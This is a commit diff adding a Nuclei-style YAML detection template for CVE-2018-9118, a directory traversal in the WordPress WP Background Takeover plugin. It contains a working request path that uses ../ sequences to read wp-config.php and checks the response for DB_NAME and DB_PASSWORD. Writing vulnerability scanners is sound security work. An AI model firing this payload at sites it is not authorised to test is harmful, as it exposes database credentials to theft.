Create CVE-2018-9118.yaml
parent
e82d39a616
commit
cfe930513b
|
@ -0,0 +1,27 @@
|
|||
id: cve-2018-9118
|
||||
|
||||
info:
|
||||
name: WP Background Takeover, Directory Traversal <= 4.1.4
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
tags: wordpress,wp-plugin,lfi
|
||||
description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability
|
||||
reference: https://www.exploit-db.com/exploits/44417
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue